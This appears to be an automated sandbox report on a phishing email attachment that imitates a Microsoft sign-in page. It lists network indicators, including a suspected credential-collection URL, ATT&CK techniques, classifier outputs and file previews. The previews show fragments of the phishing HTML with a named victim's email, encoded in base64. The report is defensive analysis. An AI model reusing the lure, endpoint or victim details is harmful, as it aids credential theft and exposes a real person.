      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile Volume queried: C:\Windows\SysWOW64 FullSizeInformation
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformation
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
      DLL Side-Loading      		1
      Process Injection      		1
      Masquerading      		OS Credential Dumping1
      Process Discovery      		Remote ServicesData from Local System2
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      Registry Run Keys / Startup Folder      		1
      DLL Side-Loading      		1
      Rundll32      		LSASS Memory1
      File and Directory Discovery      		Remote Desktop ProtocolData from Removable Media3
      Non-Application Layer Protocol      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      Registry Run Keys / Startup Folder      		1
      Process Injection      		Security Account Manager14
      System Information Discovery      		SMB/Windows Admin SharesData from Network Shared Drive4
      Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      DLL Side-Loading      		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
      Ingress Tool Transfer      		Traffic DuplicationData Destruction

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      No Antivirus matches

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      SourceDetectionScannerLabelLink
      206.23.85.13.in-addr.arpa1%VirustotalBrowse
      stackpath.bootstrapcdn.com0%VirustotalBrowse
      cdnjs.cloudflare.com0%VirustotalBrowse
      aadcdn.msftauth.net0%VirustotalBrowse
      www.google.com0%VirustotalBrowse
      sni1gl.wpc.omegacdn.net0%VirustotalBrowse
      code.jquery.com1%VirustotalBrowse
      maxcdn.bootstrapcdn.com0%VirustotalBrowse
      cos.sa-saopaulo.myqcloud.com0%VirustotalBrowse
      s-part-0036.t-0009.t-msedge.net0%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      http://154.12.225.163/7353914071/next.php0%VirustotalBrowse

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      stackpath.bootstrapcdn.com
      		104.18.10.207
      		truefalseunknown
      cos.sa-saopaulo.myqcloud.com
      		43.135.205.15
      		truefalseunknown
      s-part-0044.t-0009.fb-t-msedge.net
      		13.107.253.72
      		truefalse
        		unknown
        code.jquery.com
        		151.101.194.137
        		truefalseunknown
        cdnjs.cloudflare.com
        		104.17.25.14
        		truefalseunknown
        s-part-0036.t-0009.t-msedge.net
        		13.107.246.64
        		truefalseunknown
        maxcdn.bootstrapcdn.com
        		104.18.11.207
        		truefalseunknown
        sni1gl.wpc.omegacdn.net
        		152.199.21.175
        		truefalseunknown
        s-part-0017.t-0009.fb-t-msedge.net
        		13.107.253.45
        		truefalse
          		unknown
          www.google.com
          		142.250.186.68
          		truefalseunknown
          7353914071-1323985617.cos.sa-saopaulo.myqcloud.com
          		unknown
          		unknownfalse
            		unknown
            aadcdn.msftauth.net
            		unknown
            		unknownfalseunknown
            206.23.85.13.in-addr.arpa
            		unknown
            		unknownfalseunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/KMDIZEAG/Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.htmltrue
              		unknown
              http://154.12.225.163/7353914071/next.phpfalseunknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              52.113.194.132
              		unknownUnited States
              		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
              142.250.186.68
              		www.google.comUnited States
              		15169GOOGLEUSfalse
              13.107.246.64
              		s-part-0036.t-0009.t-msedge.netUnited States
              		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
              142.250.185.67
              		unknownUnited States
              		15169GOOGLEUSfalse
              172.217.16.202
              		unknownUnited States
              		15169GOOGLEUSfalse
              104.18.10.207
              		stackpath.bootstrapcdn.comUnited States
              		13335CLOUDFLARENETUSfalse
              52.109.68.130
              		unknownUnited States
              		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
              154.12.225.163
              		unknownUnited States
              		174COGENT-174USfalse
              172.217.18.3
              		unknownUnited States
              		15169GOOGLEUSfalse
              104.18.11.207
              		maxcdn.bootstrapcdn.comUnited States
              		13335CLOUDFLARENETUSfalse
              43.135.205.15
              		cos.sa-saopaulo.myqcloud.comJapan4249LILLY-ASUSfalse
              2.19.126.151
              		unknownEuropean Union
              		16625AKAMAI-ASUSfalse
              239.255.255.250
              		unknownReserved
              		unknownunknownfalse
              52.109.28.46
              		unknownUnited States
              		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
              152.199.21.175
              		sni1gl.wpc.omegacdn.netUnited States
              		15133EDGECASTUSfalse
              20.42.73.24
              		unknownUnited States
              		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
              151.101.194.137
              		code.jquery.comUnited States
              		54113FASTLYUSfalse
              142.250.184.206
              		unknownUnited States
              		15169GOOGLEUSfalse
              52.109.76.243
              		unknownUnited States
              		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
              104.17.25.14
              		cdnjs.cloudflare.comUnited States
              		13335CLOUDFLARENETUSfalse
              66.102.1.84
              		unknownUnited States
              		15169GOOGLEUSfalse

              Private

              IP
              192.168.2.16
              192.168.2.23

              General Information

              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1530598
              Start date and time:2024-10-10 09:27:31 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:defaultwindowsinteractivecookbook.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:18
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • EGA enabled
              Analysis Mode:stream
              Analysis stop reason:Timeout
              Sample name:Quarantined Messages(11).zip
              Detection:MAL
              Classification:mal56.phis.winZIP@18/38@8/151
              Cookbook Comments:
              • Found application associated with file extension: .zip

              Warnings

              • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 23.60.203.209
              • Excluded domains from analysis (whitelisted): fs.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtQueryAttributesFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtSetValueKey calls found.
              • VT rate limit hit for: s-part-0017.t-0009.fb-t-msedge.net

              LLM Input / Output

              InputOutput
              URL: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/KMDIZEAG/Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.html Model: jbxai
              {
"brand":["Microsoft"],
"contains_trigger_text":false,
"trigger_text":"",
"prominent_button_name":"Sign in options",
"text_input_field_labels":"unknown",
"pdf_icon_visible":false,
"has_visible_captcha":false,
"has_urgent_text":false,
"text":"Microsoft Taking you to your Organization's sign-in page ... cancel Sign in options",
"has_visible_qrcode":false}
              URL: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/KMDIZEAG/Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.html Model: jbxai
              {
"brand":["Microsoft"],
"contains_trigger_text":false,
"trigger_text":"",
"prominent_button_name":"Sign in",
"text_input_field_labels":["Enter password",
"Forget password?"],
"pdf_icon_visible":false,
"has_visible_captcha":false,
"has_urgent_text":false,
"text":"Microsoft riccardo.nobile@beantech.it Enter password Forget password? Sign in",
"has_visible_qrcode":false}
              URL: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/KMDIZEAG/Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.html Model: jbxai
              {
"brand":["Microsoft"],
"contains_trigger_text":false,
"trigger_text":"",
"prominent_button_name":"Sign in",
"text_input_field_labels":["Enter password",
"Forget password?"],
"pdf_icon_visible":false,
"has_visible_captcha":false,
"has_urgent_text":false,
"text":"riccardo.nobile@beantech.it Enter password Your account or password is incorrect. If you don't remember your password,
 reset it now Password Forget password? Sign in",
"has_visible_qrcode":false}

              Created / dropped Files

              C:\Users\user\AppData\Local\Microsoft\FORMS\FRMCACHE.DAT

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:data
              Category:dropped
              Size (bytes):231348
              Entropy (8bit):4.393874728771997
              Encrypted:false
              SSDEEP:
              MD5:2507692E9932661F502DCDC5EBB6A991
              SHA1:8FFD313B085253015DF4B110B66EB834D4C7636E
              SHA-256:194F82DEA463CE62A56DD01FF2B5CD36DFBEE759BD4869C029955EB74C490493
              SHA-512:B78F0C81CDCF25279EC2B4A6EC10A0FB8718125539F84FA4F592FCDC2B0DE53B1F094E615A85A1DAE919F8BD199D599F5B9799029223AC06421B8157266D649B
              Malicious:false
              Reputation:unknown
              Preview:TH02...... ...Q.........SM01X...,.....E.............IPM.Activity...........h...............h............H..h\.S.....=......h............H..h\cal ...pDat...h .y.0.....S....hu.|............h........_`Mk...h).|.@...I.lw...h....H...8.Rk...0....T...............d.........2h...............k..D...........!h.............. h.K.9.....S...#h....8.........$h........8....."h.%}......%}...'h..............1hu.|.<.........0h....4....Rk../h....h.....RkH..h....p...\.S...-h .........S...+h.|.....P.S................. ..............F7..............FIPM.Activity....Form....Standard....Journal Entry...IPM.Microsoft.FolderDesign.FormsDescription................F.k..........1122110020000000.GwwMicrosoft...This form is used to create journal entries.........kf...... ..........&...........(.......(... ...@.....................................................................................................................fffffffff........wwwwwwww.p....pp..............p...............pw..............pw..DDDDO..

              C:\Users\user\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntities.bin

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:ASCII text, with very long lines (65536), with no line terminators
              Category:dropped
              Size (bytes):322260
              Entropy (8bit):4.000299760592446
              Encrypted:false
              SSDEEP:
              MD5:CC90D669144261B198DEAD45AA266572
              SHA1:EF164048A8BC8BD3A015CF63E78BDAC720071305
              SHA-256:89C701EEFF939A44F28921FD85365ECD87041935DCD0FE0BAF04957DA12C9899
              SHA-512:16F8A8A6DCBAEAEFB88C7CFF910BCCC71B76A723CF808B810F500E28E543112C2FAE2491D4D209569BD810490EDFF564A2B084709B02963BCAF6FDF1AEEC59AC
              Malicious:false
              Reputation:unknown
              Preview:51253fe60063c31af0d295afb42228b0:v2:2:1:1590:2:8479:76bd602437550e98c9043d06a55186ab7d95dea5a0e935a599f73e62a8c9b158e0afcb19351f6c353940c06a38172b94d18c02cf92bb8a80184eccca0392b259ab3e71dae73e491c7941997cb36ad4a198661f622dad478d840f66d530a0dde78acea3367f91fff62fbb3dc18faff0c708ad30edef5bea8b22c5fd782b770d8993386eaa784fd19a3c3e1db3b537b1a94d3d4fbd46f8df8fddf6d16611969fe0a97c50e0f3ac24750c93257cf5c161184aa7385800c87d803b339632a3d8ec7fe17a0afd83ce9e9d0e3f7b8d579637928a811f1f7e6d1887df2ddc7d4f752c4d600235e426c92c7bf8a1362f95457998cc0e5d4261f0efa4fada0f866dbcefb407dacab7a2914e91c2f08200f38c2d9d621962145b1464b0f204b326118a53ecdcab22bff005fdd5257c99a6dc51ac0600a49f2ef782396987e78c08b846dad5db55e8ccefffc64863bc2c3e90b95a09d25d0814a848c98fe01a82d4e30e6682dd546e12c45ca0d280a45295ab4bd632dafb070edfdc3c9e38313d5aeb195972986f8011b66817028fd8c78b67a0ac7e780eecc3fb6a31f5a025b8a9a3db278a98c0696aeaac739b18688b0f9c7d751bba02cc5f4e41853fb119b3c0c915059aaa92971244a1989124f12881ca88e6410df70b793a2c3a736ff4

              C:\Users\user\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntitiesUpdated.bin

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):10
              Entropy (8bit):2.9219280948873623
              Encrypted:false
              SSDEEP:
              MD5:BF57E7081A663349894DA833BF1A6EB8
              SHA1:9C30D29E0CD716B4F33F46A46CBEC7C6E63AEA2B
              SHA-256:2C67DA102EF5E8E6D53F6A8EB0561BA609B38A60DDB7C8DEECE5BDEB2899AC19
              SHA-512:5A637180783E51BE796669BA92BF45C6AC0B645125C402C07147D2528636F4748059211050240E88E7346516ED5C79CE86756DCCB45073522BC60704C75482B3
              Malicious:false
              Reputation:unknown
              Preview:1728545336

              C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\6E4808A7-C5F0-4081-ADCE-704581E21FDC

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):177810
              Entropy (8bit):5.2872168991195165
              Encrypted:false
              SSDEEP:
              MD5:C88D686C0A6A061D8C13787FF858C31D
              SHA1:BD44BDEF2694A4A22DFF9D00BA0DBE9F0AFA8D09
              SHA-256:6F3BD0428C1C29DEC9E026E0820B8FE74E208D7D566F3C4ED2FC123375699579
              SHA-512:28C9B2644E1139DE334D374D7D88A39A063C981357B6F5F43AFB451074FC4B253DCA4997D277D4100EA008513FF935582DCD6A85AC48FE67EC0E9F475EE013B8
              Malicious:false
              Reputation:unknown
              Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2024-10-10T07:28:54">.. Build: 16.0.18124.40132-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://word-edit.officeapps.live.com/we/rrdiscovery.ashx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[

              C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:SQLite 3.x database, last written using SQLite version 3034001, writer version 2, read version 2, file counter 2, database pages 1, cookie 0, schema 0, largest root page 1, unknown 0 encoding, version-valid-for 2
              Category:dropped
              Size (bytes):4096
              Entropy (8bit):0.09304735440217722
              Encrypted:false
              SSDEEP:
              MD5:D0DE7DB24F7B0C0FE636B34E253F1562
              SHA1:6EF2957FDEDDC3EB84974F136C22E39553287B80
              SHA-256:B6DC74E4A39FFA38ED8C93D58AADEB7E7A0674DAC1152AF413E9DA7313ADE6ED
              SHA-512:42D00510CD9771CE63D44991EA10C10C8FBCF69DF08819D60B7F8E7B0F9B1D385AE26912C847A024D1D127EC098904784147218869AE8D2050BCE9B306DB2DDE
              Malicious:false
              Reputation:unknown
              Preview:SQLite format 3......@ ..........................................................................K.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db-journal

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:SQLite Rollback Journal
              Category:dropped
              Size (bytes):4616
              Entropy (8bit):0.13784977103055013
              Encrypted:false
              SSDEEP:
              MD5:7433ACC442F5D78A3F1179BBD037E011
              SHA1:922130CA3A7F04646E2A0ED9805A46F47222463C
              SHA-256:0DAB874F13D3A31690D15B66B6BDADE96CB9AE568C0F2AEF48590EE297214568
              SHA-512:87D0B982C695ACC0EBBAF7B79EE76E0524589CFDEC8906EAD64C715F5F4BC24D9BB54EA67EEFAC3924C2507883C42DAC032F4E4F82557500F2B8DDDDA60BAA4C
              Malicious:false
              Reputation:unknown
              Preview:.... .c.....%h......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................SQLite format 3......@ ..........................................................................K.................................................................................................................................................................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db-shm

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:data
              Category:dropped
              Size (bytes):32768
              Entropy (8bit):0.04486648292292196
              Encrypted:false
              SSDEEP:
              MD5:F61FEB3D2F44ED4A147E5193CE8A342D
              SHA1:AE8B3F6D688D6ECAC05BFE35969CEA68AE49310D
              SHA-256:7E02471988D99FC083054E8485371EE589C51F16C17268A05FDCD896CF470409
              SHA-512:1D7C391AECD61BB4D9A9D976E7B8C45F961436109F23CA818891761CCE6A33FB92DE6A1BD842083E35F720893918C37E7EBAC174DA6BF99998162113A0BB51CC
              Malicious:false
              Reputation:unknown
              Preview:..-......................3...Lv..Q...`4a.........-......................3...Lv..Q...`4a...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db-wal

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:SQLite Write-Ahead Log, version 3007000
              Category:dropped
              Size (bytes):45352
              Entropy (8bit):0.3954210488314096
              Encrypted:false
              SSDEEP:
              MD5:806A9A7D2C5DBAED7C507E2FC8385F2C
              SHA1:BD8A22AB4FA616660908D426CDEC21825764E147
              SHA-256:4FE6C6C42A05D3BFF5C59DFD3DB550130D4709CCA220C79BF6376F7AA150600E
              SHA-512:95EF72AC4018C141C2D46E6448FBA0F1BDADBB329764566B8CDCD52309A1A76216F8B98065377242F4714335E53E0FDA0A7ED8584DBF50C248C26B8F91CD5D1E
              Malicious:false
              Reputation:unknown
              Preview:7....-...........Q...`4..T..*...........Q...`4._u...OSQLite format 3......@ ..........................................................................K.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\KMDIZEAG\Payment_Advice_Note_Riccardo.nobile_5827096209CQDM (002).html:Zone.Identifier (copy)

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:HTML document, ASCII text, with very long lines (64099), with CRLF line terminators
              Category:dropped
              Size (bytes):0
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:
              MD5:1BBC4F6D6474FE87C8589C39DB92DE09
              SHA1:595E9AC037D8DEE60D47225CED8535C352C3681B
              SHA-256:EA0D694C1555651B233A89BECBDD389F559BAACF6C71D9AA0FACE21B264AD7CD
              SHA-512:6B9A9CEE51404C7B385B1116344C53F002CAB6EDE297220BBCAB318604699AE5CE42BA96ACCDB60EEE9C24CC94B202BD1D0FFE9204A4DD9D21A121C65F071DF5
              Malicious:false
              Reputation:unknown
              Preview: <span>Anim bresaola do, beef ham pork belly tempor pariatur nisi aliqua dolor ut aliquip dolore. Ut officia aliquip ut. Dolore nostrud cupim ut occaecat chuck. In ea ullamco beef ribs, t-bone incididunt kielbasa andouille bresaola pork belly enim ut. Ullamco in chislic, sint et in landjaeger mollit adipisicing t-bone magna ribeye sirloin. In turkey sed cillum adipisicing. Andouille est meatball ribeye, shoulder eiusmod eu drumstick pork belly incididunt ut veniam. Alcatra ground round leberkas meatball, pork belly ea short ribs. Nisi turducken short ribs rump chicken. Spare ribs ipsum pork chop, est ut porchetta commodo fatback burgdoggen biltong ea.</span> -->..<script>..let rh13z8jemt = 'cmljY2FyZG8ubm9iaWxlQGJlYW50ZWNoLml0';// Nostrud pastrami ad, leberkas beef frankfurter biltong spare ribs strip steak swine chuck ut ea ipsum. Sunt culpa enim, meatball salami fatback leberkas ham meatloaf labore drumstick consectetur laboris hamburger ipsum. Kevin esse deserunt do elit tenderl

              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\KMDIZEAG\Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.html

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:HTML document, ASCII text, with very long lines (64099), with CRLF line terminators
              Category:dropped
              Size (bytes):366519
              Entropy (8bit):3.8716428305128274
              Encrypted:false
              SSDEEP:
              MD5:1BBC4F6D6474FE87C8589C39DB92DE09
              SHA1:595E9AC037D8DEE60D47225CED8535C352C3681B
              SHA-256:EA0D694C1555651B233A89BECBDD389F559BAACF6C71D9AA0FACE21B264AD7CD
              SHA-512:6B9A9CEE51404C7B385B1116344C53F002CAB6EDE297220BBCAB318604699AE5CE42BA96ACCDB60EEE9C24CC94B202BD1D0FFE9204A4DD9D21A121C65F071DF5
              Malicious:false
              Reputation:unknown
              Preview: <span>Anim bresaola do, beef ham pork belly tempor pariatur nisi aliqua dolor ut aliquip dolore. Ut officia aliquip ut. Dolore nostrud cupim ut occaecat chuck. In ea ullamco beef ribs, t-bone incididunt kielbasa andouille bresaola pork belly enim ut. Ullamco in chislic, sint et in landjaeger mollit adipisicing t-bone magna ribeye sirloin. In turkey sed cillum adipisicing. Andouille est meatball ribeye, shoulder eiusmod eu drumstick pork belly incididunt ut veniam. Alcatra ground round leberkas meatball, pork belly ea short ribs. Nisi turducken short ribs rump chicken. Spare ribs ipsum pork chop, est ut porchetta commodo fatback burgdoggen biltong ea.</span> -->..<script>..let rh13z8jemt = 'cmljY2FyZG8ubm9iaWxlQGJlYW50ZWNoLml0';// Nostrud pastrami ad, leberkas beef frankfurter biltong spare ribs strip steak swine chuck ut ea ipsum. Sunt culpa enim, meatball salami fatback leberkas ham meatloaf labore drumstick consectetur laboris hamburger ipsum. Kevin esse deserunt do elit tenderl

              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\KMDIZEAG\Payment_Advice_Note_Riccardo.nobile_5827096209CQDM.html:Zone.Identifier

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):26
              Entropy (8bit):3.95006375643621
              Encrypted:false
              SSDEEP:
              MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
              SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
              SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
              SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
              Malicious:false
              Reputation:unknown
              Preview:[ZoneTransfer]..ZoneId=3..

              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\KMDIZEAG\Remittance Advice note Ref63aa558c8bd19f14fba31e27f9a4ad0922560090 (389 KB).msg

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:CDFV2 Microsoft Outlook Message
              Category:dropped
              Size (bytes):444928
              Entropy (8bit):4.407364562632454
              Encrypted:false
              SSDEEP:
              MD5:F39181FD430DEBFA6DB8B8BA6A61C92E
              SHA1:B0E29CDED862E0AFE78CB59BF928798A092F2B39
              SHA-256:23728FF2A41A6B0B1759FA7852BCD805F1CAFA3B2A9B7A5A911D91248514B49C
              SHA-512:0A456076F704591B4BB86D7B041199D34E5992F62C9E135B6B00264005B01D4BFCAFDD93564C8FB8768E9D295C3F79D6871D3999326CD4B035DB1781090B54D7
              Malicious:false
              Reputation:unknown
              Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y..........................................................................................^..........@......._._.p.r.o.p.e.r.t.i.e.s._.v.e.r.s.i.o.n.1...0...................0..............................................................._._.n.a.m.e.i.d._.v.e.r.s.i.o.n.1...0...........................(...........,................................^.................._._.s.u.b.s.t.g.1...0._.0.E.0.4.0.0.1.F.........................*.......................................

              C:\Users\user\AppData\Local\Temp\Diagnostics\OUTLOOK\App1728545332631920300_6EBA4BCF-A691-4330-98F7-B864561BD176.log

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:ASCII text, with very long lines (28727), with CRLF line terminators
              Category:dropped
              Size (bytes):20971520
              Entropy (8bit):0.16131094430806117
              Encrypted:false
              SSDEEP:
              MD5:A690719F8F31A1BF13B4A322A6A49B7D
              SHA1:0B1201448C3ED89333457C903E9D05BBFBDC877F
              SHA-256:8D6C3B77468E6A544EC4AD15592D813698CA99D1726300C16945A8F11C160EC2
              SHA-512:B1F765C8CE101D53BF0201622B07B153592EA97D71CB6896486D9234A22CDB6377B42122B8216C346B3E91EF120E2886670DD680E12D1F7BBDC4618273BD7A2D
              Malicious:false
              Reputation:unknown
              Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..10/10/2024 07:28:52.685.OUTLOOK (0x1420).0xE98.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.GDIAssistant.HandleCallback","Flags":30962256044949761,"InternalSequenceNumber":21,"Time":"2024-10-10T07:28:52.685Z","Contract":"Office.System.Activity","Activity.CV":"z0u6bpGmMEOY97hkVhvRdg.4.9","Activity.Duration":12,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.GdiFamilyName":"","Data.CloudFontStatus":6,"Data.CloudFontTypes":256}...10/10/2024 07:28:52.701.OUTLOOK (0x1420).0xE98.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.ResourceClient.Deserialize","Flags":30962256044949761,"InternalSequenceNumber":23,"Time":"2024-10-10T07:28:52.701Z","Contract":"Office.System.Activity","Activity.CV":"z0u6bpGmMEOY97hkVhvRdg.4.10","Activity.Duration":11772,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.JsonFileMajorVer

              C:\Users\user\AppData\Local\Temp\Diagnostics\OUTLOOK\App1728545332632779000_6EBA4BCF-A691-4330-98F7-B864561BD176.log

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
              File Type:data
              Category:dropped
              Size (bytes):20971520
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:
              MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
              SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
              SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
